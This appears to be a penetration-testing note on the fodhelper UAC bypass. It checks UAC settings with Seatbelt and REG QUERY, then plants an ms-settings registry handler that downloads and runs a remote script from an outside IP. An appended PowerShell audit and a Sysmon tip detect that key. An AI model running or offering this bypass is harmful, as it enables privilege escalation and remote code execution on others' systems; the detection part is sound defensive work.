UAC Bypass

Seatbelt.exe
C:\Tools\Seatbelt\Seatbelt\bin\Debug\Seatbelt.exe uac
====== UAC ======
ConsentPromptBehaviorAdmin : 5 - PromptForNonWindowsBinaries
EnableLUA (Is UAC enabled?) : 1
Registry
EnableLUA is REG_DWORD 0x1, so UAC is enabled:
C:\>REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
ConsentPromptBehaviorAdmin is REG_DWORD 0x5, which is PromptForNonWindowsBinaries in the Seatbelt output above:
C:\>REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5
Create the registry keys that launch PowerShell. Registry key names are limited to 255 characters, registry value names are limited to 16383 characters, and the value data itself is limited only by available system memory.
PS C:\> New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value "powershell.exe (New-Object System.Net.WebClient).DownloadString('http://192.168.19.134/run.txt') | IEX" -Force
PS C:\> New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
Then execute fodhelper.exe; we will get a prompt with High integrity level:
C:\Windows\System32\fodhelper.exe
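A defender-side audit for the registry override used above, as an added example that is not part of the original page: it looks in every loaded user hive for an ms-settings\shell\open\command key and reports it together with the two UAC policy values queried earlier. The function name Test-MsSettingsHijack is hypothetical, and treating any per-user copy of this key as anomalous is an assumption to baseline in your own environment.

```powershell
# Added example (not from the original page): audit a host for the per-user
# ms-settings handler override and the UAC policy values shown above.
# The function name Test-MsSettingsHijack is hypothetical.

function Test-MsSettingsHijack {
    [CmdletBinding()]
    param()

    $policyPath = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System'
    $policy = Get-ItemProperty -Path $policyPath -ErrorAction SilentlyContinue

    # Enumerate loaded user hives (skips the *_Classes hives and service SIDs).
    $hives = Get-ChildItem -Path Registry::HKEY_USERS |
        Where-Object { $_.PSChildName -match '^S-1-5-21-[\d-]+$' }

    foreach ($hive in $hives) {
        $key = "Registry::HKEY_USERS\$($hive.PSChildName)\Software\Classes\ms-settings\shell\open\command"
        if (-not (Test-Path -LiteralPath $key)) { continue }

        $item = Get-Item -LiteralPath $key
        [pscustomobject]@{
            UserSid                    = $hive.PSChildName
            Key                        = $key
            # '' is the name of the key's (Default) value, i.e. the handler command
            Command                    = $item.GetValue('')
            # The write-up creates DelegateExecute as an empty string, so test
            # for the value name rather than for non-empty data.
            HasDelegateExecute         = $item.GetValueNames() -contains 'DelegateExecute'
            EnableLUA                  = $policy.EnableLUA
            ConsentPromptBehaviorAdmin = $policy.ConsentPromptBehaviorAdmin
        }
    }
}

$findings = @(Test-MsSettingsHijack)
if ($findings.Count -eq 0) {
    Write-Output 'No per-user ms-settings\shell\open\command override found.'
} else {
    $findings | Format-List
}
```

Run it elevated to read other users' hives. Sysmon registry events (IDs 12 and 13) filtered on the same key path give the equivalent signal in real time.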